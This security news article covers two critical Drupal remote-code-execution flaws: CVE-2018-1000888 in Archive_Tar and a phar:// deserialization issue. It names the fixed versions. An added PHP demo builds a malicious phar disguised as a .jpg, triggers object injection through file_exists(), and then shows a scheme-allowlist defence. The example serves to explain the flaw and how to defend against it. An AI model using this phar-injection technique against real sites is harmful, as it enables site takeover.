Critical vulnerabilities found in Drupal

Developers recommend users to update their systems as soon as possible

The Drupal content management system (CMS) project has just released two security updates that fix critical vulnerabilities, as reported by network security and ethical hacking specialists from the International Institute of Cyber Security. If exploited, the flaws would allow an attacker to take control of the affected site.

Specifically, the patches cover the 7.x, 8.5.x and 8.6.x branches of Drupal; affected sites should update to version 7.62, 8.5.9 or 8.6.6 respectively.

The first critical vulnerability, tracked as CVE-2018-1000888, lies in the third-party PEAR Archive_Tar library that Drupal bundles; the library's maintainers have also fixed it upstream. If exploited, it could lead to remote code execution, according to the network security experts.

The second vulnerability, which had not yet been assigned a CVE identifier at the time of writing, is a remote code execution flaw involving PHP's built-in phar stream wrapper. When a file operation (even a simple existence check) is performed on an untrusted phar:// URI, PHP parses the archive and unserializes the metadata stored in it, which lets an attacker who controls that archive trigger PHP object injection. Drupal code of any kind (core, contrib or custom) that performs file operations on insufficiently validated user input is therefore exposed to this vulnerability.
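The following is an added example, not code from the Drupal project or from the article's authors. It shows the mechanism described above end to end: a hypothetical gadget class (CacheFlusher, invented for the demo), an attacker-built phar archive renamed to a .jpg, a "harmless" file_exists() call on user input that fires the gadget, and a simplified allowlist check that refuses the phar:// scheme before any file operation runs. It targets the PHP 7 releases current at the time of the advisory and must be run with phar.readonly=0 so the payload can be built locally; later PHP versions changed when phar metadata is unserialized, so the first step may not fire there. The allowlist check is written for this example only; Drupal's own fix took a different route, restricting what the phar:// wrapper is allowed to open.

```php
<?php
// Added example, not code from the Drupal project or the article's authors.
// Run with: php -d phar.readonly=0 phar_demo.php   (PHP 7.x; see lead-in)

// Hypothetical "gadget": any loaded class with a magic method that does
// something useful to an attacker. __wakeup() runs only on unserialize(),
// so building the payload below does not trigger it; opening it does.
class CacheFlusher {
    public $target;
    public $payload;
    public function __wakeup() {
        file_put_contents($this->target, $this->payload);
        $GLOBALS['gadget_fired'][] = $this->target;
    }
}

// Attacker side (constructed for the demo): a phar whose metadata is a
// serialized gadget. The Phar class insists on a .phar name at creation,
// but the phar:// wrapper ignores the extension, so the file is renamed
// to .jpg afterwards, which a typical upload filter would accept.
function buildMaliciousPhar(string $finalPath): void {
    $tmp = $finalPath . '.phar';
    @unlink($tmp);
    @unlink($finalPath);
    $phar = new Phar($tmp);
    $phar->startBuffering();
    $phar->addFromString('x.txt', 'x');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $gadget = new CacheFlusher();
    $gadget->target = sys_get_temp_dir() . '/phar_demo_pwned.txt';
    $gadget->payload = "written during phar metadata unserialize\n";
    $phar->setMetadata($gadget);
    $phar->stopBuffering();
    rename($tmp, $finalPath);
}

// Victim side: a harmless-looking check on user-controlled input.
// file_exists() opens the stream; for phar:// that means parsing the
// archive manifest and unserializing its metadata before returning.
function vulnerableExists(string $userPath): bool {
    return file_exists($userPath);
}

// Hardened variant: reject any stream-wrapper scheme that is not on an
// explicit allowlist, before touching the filesystem. Simplified check
// written for this example, not Drupal's implementation.
function safeExists(string $userPath, array $allowedSchemes = ['file']): bool {
    if (preg_match('#^([a-z][a-z0-9+.\-]*)://#i', $userPath, $m)) {
        $scheme = strtolower($m[1]);
        if (!in_array($scheme, $allowedSchemes, true)) {
            throw new InvalidArgumentException("refusing stream wrapper '{$scheme}://'");
        }
    }
    return file_exists($userPath);
}

$GLOBALS['gadget_fired'] = [];
$upload = sys_get_temp_dir() . '/avatar.jpg';   // what an uploaded file would look like
buildMaliciousPhar($upload);

$userInput = 'phar://' . $upload . '/x.txt';    // attacker-supplied "path"
vulnerableExists($userInput);
printf("vulnerable check: gadget fired %d time(s)\n", count($GLOBALS['gadget_fired']));

try {
    safeExists($userInput);
} catch (InvalidArgumentException $e) {
    echo "hardened check: ", $e->getMessage(), "\n";
}
```

In a Drupal code base the allowlist would carry the site's own schemes (public://, private://, temporary://) rather than just file; the point of the check is that phar:// is never reachable from user input, whatever extension the uploaded file carries.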

Although both vulnerabilities are rated critical, not everything is bad news. According to the network security experts, there is no evidence that either flaw has been exploited in real environments, and exploitation is not trivial because, in the reported scenarios, the attacker needs administrator privileges on the vulnerable site. That should not delay patching, however: contrib or custom code that performs file operations on user input may expose the phar issue to less privileged users.
